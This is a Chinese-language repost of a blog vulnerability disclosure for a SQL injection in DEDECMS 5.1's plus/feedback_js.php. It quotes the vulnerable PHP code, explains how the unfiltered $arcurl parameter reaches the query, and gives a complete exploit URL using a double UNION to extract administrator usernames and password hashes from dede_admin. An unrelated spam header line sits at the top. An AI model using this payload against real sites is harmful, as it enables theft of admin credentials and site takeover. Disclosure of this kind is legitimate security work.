自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

DEDECMS 5.1 feedback_js.php 0DAY

安全 漏洞
SQL注入##遠程攻擊##立即處理[msg]這個漏洞是我和Rainy'Fox一起發(fā)現(xiàn)的。同樣是在magic_quotes_gpc=off的情況下可用漏洞版本:DEDECMS 5.1此漏洞可拿到后臺管理員的帳號和加密HASH,漏洞存在文件plus/feedback_js.php,未過濾參數(shù)為$arcurl...

這個漏洞是我和Rainy'Fox一起發(fā)現(xiàn)的

同樣是在magic_quotes_gpc=off的情況下可用

漏洞版本:DEDECMS 5.1

此漏洞可拿到后臺管理員的帳號和加密HASH,漏洞存在文件plus/feedback_js.php,未過濾參數(shù)為$arcurl

......
$urlindex = 0;
if(empty($arcID))
{
$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");
//此處$arcurl沒有過濾
if(is_array($row)) $urlindex = $row['id'];
//存在結(jié)果則把$urlindex賦值為查詢到的$row['id'],我們可以構(gòu)造SQL語句帶入下面的操作中了
}
if(empty($arcID) && empty($urlindex)) exit();
//如果$arcID為空或$urlindex為空則退出
......
if(empty($arcID)) $wq = " urlindex = '$urlindex' ";
//我們讓$arcID為空,剛才上面執(zhí)行的結(jié)果就會被賦值給$wq帶入下面的操作中執(zhí)行了.
else $wq = " aid='$arcID' ";
$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
......

看一下利用方法吧,嘿,為了閉合我用了兩次union

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

【編輯推薦】

  1. 重新審視企業(yè)IPS的應(yīng)用:防御SQL注入攻擊的利劍
  2. SQL注入攻擊及其防范檢測技術(shù)研究
  3. 安全技巧:學會檢查SQL注入式攻擊漏洞
責任編輯:安泉 來源: 鬼仔's Blog
相關(guān)推薦

2009-07-06 13:15:07

2015-05-20 16:34:14

2021-10-06 13:48:50

0day漏洞攻擊

2013-05-23 10:48:14

EPATHOBJ 0d0day漏洞

2024-07-31 08:46:10

2013-05-24 14:02:42

2022-03-25 13:41:55

漏洞網(wǎng)絡(luò)攻擊Quantum(量子

2011-10-24 16:26:06

2011-08-26 11:44:01

2009-09-09 08:54:50

2011-03-15 15:14:22

2011-02-28 09:34:55

2010-01-20 16:13:15

2020-12-17 10:28:27

漏洞網(wǎng)絡(luò)攻擊網(wǎng)絡(luò)安全

2021-07-14 17:17:45

0day漏洞惡意代碼

2015-07-14 10:53:19

Hacking Tea0Day漏洞

2009-07-15 16:29:03

2023-01-12 12:00:33

2022-03-30 09:09:39

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2010-09-01 15:18:04

點贊
收藏

51CTO技術(shù)棧公眾號